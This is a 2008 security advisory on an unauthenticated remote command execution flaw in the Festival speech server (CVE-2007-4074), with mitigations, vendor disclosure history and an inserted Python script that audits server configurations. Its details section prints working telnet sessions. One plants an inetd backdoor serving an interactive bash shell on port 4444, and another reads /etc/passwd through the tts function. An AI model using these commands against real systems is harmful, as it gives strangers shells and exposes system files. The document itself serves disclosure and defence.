Subject: [UNIX] Festival Command Execution Vulnerability
Date: 8 Apr 2008 14:07:02 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com

  Festival Command Execution Vulnerability
------------------------------------------------------------------------


SUMMARY

Festival (http://www.cstr.ed.ac.uk/projects/festival/) offers "a general 
framework for building speech synthesis systems as well as including 
examples of various modules". The Festival server is vulnerable to 
unauthenticated remote code execution.

Further research indicates that this vulnerability has already been 
reported as a local privilege escalation against both the Gentoo and SuSE 
GNU/Linux distributions and was assigned CVE-2007-4074.

The remote form of this vulnerability was identified in 1.96~beta-5 as 
distributed in Debian unstable but it is also believed that Ubuntu Hardy 
Heron was affected.

DETAILS

Vulnerable Systems:
 * Festival version 1.96:beta July 2004

The Festival server, which can be started using festival --server, is 
vulnerable to unauthenticated remote command execution because it exposes 
a Scheme interpreter to every client that connects.  Standard Scheme 
functions can therefore be used to execute further code, like so:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(system "echo '4444 stream tcp nowait festival /bin/bash /bin/bash -i' >
/tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf")

Connection closed by foreign host.

Whilst this is the most trivial way that the vulnerability can be 
exploited, the inclusion of a Scheme interpreter available without 
authentication allows for other vectors of attack.  Scheme functions such 
as SayText and tts (which reads a file on the vulnerable system) are of 
particular interest, for example:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(tts "/etc/passwd" nil)

Whilst it is acknowledged that the inclusion of the Scheme interpreter in 
this manner is entirely intentional, the default behaviour of the server 
could be exploited, particularly where the user is unaware of the server's 
existence.  In the case of both Debian unstable and Ubuntu Hardy Heron, 
this meant that the server was likely to be started by the init subsystem, 
albeit as a non-privileged user.

Solutions:
In order to completely protect against the vulnerability (in the short 
term), Nth Dimension recommend turning off the server or filtering 
connections to the affected port using a host based firewall.  The server 
itself can be secured by applying the patches located at 
http://bugs.gentoo.org/show_bug.cgi?id=170477. These include a default 
configuration which limits access to localhost and an optional password 
which prevents unauthenticated access.
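The two mitigations above (restrict the server to localhost, require a password) can be checked mechanically. The following script is an added example, not code from the advisory or the Festival project; it assumes the fix is expressed through Festival's server_access_list and server_passwd settings (the advisory does not name them) and audits a weak and a hardened site configuration, both constructed here.

```python
import re

# Constructed sample site configurations (Scheme), written for this example;
# they are not taken from the advisory or from the Festival project.
WEAK_CONFIG = """
;; Listens on 1314 for every host, no password: any client may evaluate Scheme.
(set! server_port 1314)
"""

HARDENED_CONFIG = """
;; Only the local machine may connect, and a password is required.
(set! server_port 1314)
(set! server_access_list '("localhost" "localhost.localdomain" "127.0.0.1"))
(set! server_passwd "replace-with-a-long-random-secret")
"""

# Assumption: the fix limits access via the server_access_list and
# server_passwd variables; the advisory itself does not name them.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "127.0.0.1", "::1"}
MIN_PASSWD_LEN = 12


def audit_festival_config(text):
    """Return a list of findings for a Festival site config; empty means OK."""
    code = re.sub(r";[^\n]*", "", text)  # drop Scheme comments so commented-out settings do not count
    findings = []
    m = re.search(r"\(set!\s+server_access_list\s+'\(([^)]*)\)\s*\)", code)
    if m is None:
        findings.append("server_access_list unset: any host may reach the interpreter")
    else:
        remote = [h for h in re.findall(r'"([^"]*)"', m.group(1)) if h not in LOCAL_NAMES]
        if remote:
            findings.append("server_access_list allows non-local hosts: " + ", ".join(remote))
    p = re.search(r'\(set!\s+server_passwd\s+"([^"]*)"\s*\)', code)
    if p is None:
        findings.append("server_passwd unset: unauthenticated access is allowed")
    elif len(p.group(1)) < MIN_PASSWD_LEN:
        findings.append("server_passwd is shorter than %d characters" % MIN_PASSWD_LEN)
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_festival_config(cfg) or ["no findings"])
```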

Following vendor notification on the 16th February 2007 (Debian) and 2nd 
March 2007 (Ubuntu), both issued patched versions in their respective 
distributions which document the possible security issue and how it can be 
resolved, and change the default behaviour of the package to prevent the 
server being started by the init subsystem.  Details of the Debian changes 
can be found firstly in bug #466146 and then #466796.  Nth Dimension would 
recommend that the patches for these bugs are applied.  Nth Dimension 
would like to thank the Debian package maintainer Kumar Appaiahi as well 
as Nico Golde of Debian testing security and Jamie Strandboge of Canonical 
for the way they worked to resolve the issue.

CVE Information:
CVE-2007-4074: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4074


ADDITIONAL INFORMATION

The information has been provided by Tim Brown (timb@nth-dimension.org.uk).



DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any 
kind. In no event shall we be liable for any damages whatsoever including 
direct, indirect, incidental, consequential, loss of business profits or 
special damages.